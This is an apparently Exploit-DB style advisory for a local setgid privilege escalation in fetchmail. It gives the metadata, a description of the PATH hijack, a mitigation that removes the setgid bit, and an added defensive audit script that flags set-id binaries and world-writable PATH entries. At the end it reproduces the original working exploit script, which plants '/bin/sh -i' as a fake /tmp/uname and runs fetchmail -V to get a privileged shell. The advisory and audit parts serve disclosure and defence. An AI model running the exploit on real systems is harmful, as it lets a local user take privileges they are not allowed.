Vendor: fetchmail
By: kf
CVSS: 7.2 (HIGH)
Setgid vulnerability
CWE: 264
Product Name: fetchmail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix-like systems
2006

Previously undisclosed local fetchmail issue

This exploit takes advantage of a setgid vulnerability in the fetchmail program. The attacker creates a malicious file named uname in the /tmp directory, sets it to be executable, and places /tmp at the front of PATH. The attacker then runs the fetchmail program, which is setgid, with the -V option, and the malicious file is executed in place of the system uname.

Mitigation:

The vulnerability can be mitigated by removing the setgid bit from the fetchmail program.
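
The exploit depends on two conditions holding together: the binary carries a set-id bit, and the caller's PATH contains a directory that other users can write to (here /tmp) or a relative entry. The following audit script is an added example, not part of the original advisory or of fetchmail; the function names `has_setid`, `unsafe_path_entries` and `path_hijack_risk` are assumptions chosen for illustration.

```sh
#!/bin/sh
# Added audit example; not part of the original advisory or of fetchmail.

# has_setid FILE: true if FILE carries the setuid or setgid bit.
has_setid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# unsafe_path_entries PATHSTRING: print each entry that is relative or empty
# (resolved against the current directory), or that is a directory other
# users can write to, such as /tmp. Runs in a subshell so IFS stays local.
unsafe_path_entries() (
    IFS=:
    set -f                          # no globbing while splitting on ':'
    for dir in $1; do
        case $dir in
            /*) ;;
            *)  printf '%s\n' "relative:${dir:-<empty>}"; continue ;;
        esac
        [ -d "$dir" ] || continue
        # In the ls -l mode string, character 9 is the "other" write bit.
        case $(ls -ldL "$dir") in
            d???????w*) printf '%s\n' "world-writable:$dir" ;;
        esac
    done
)

# path_hijack_risk FILE PATHSTRING: succeeds only when both preconditions
# hold: FILE is set-id and PATHSTRING contains an unsafe entry.
path_hijack_risk() {
    has_setid "$1" && [ -n "$(unsafe_path_entries "$2")" ]
}

# Run directly with one argument to audit that binary against $PATH.
if [ "$#" -eq 1 ]; then
    if path_hijack_risk "$1" "$PATH"; then
        echo "RISK: $1 is set-id and PATH has unsafe entries:"
        unsafe_path_entries "$PATH"
    else
        echo "ok: $1"
    fi
fi
```

After the set-id bit is removed as described under Mitigation, `has_setid` fails for the binary and `path_hijack_risk` no longer reports it, whatever PATH contains.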

Exploit-DB raw data:

#!/bin/sh
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) 
#
# Previously undisclosed local fetchmail issue. This takes setgid=6
#
# http://docs.info.apple.com/article.html?artnum=106704

export PATH=/tmp:$PATH
echo /bin/sh -i > /tmp/uname
chmod +x /tmp/uname
/usr/bin/fetchmail -V

# milw0rm.com [2006-08-01]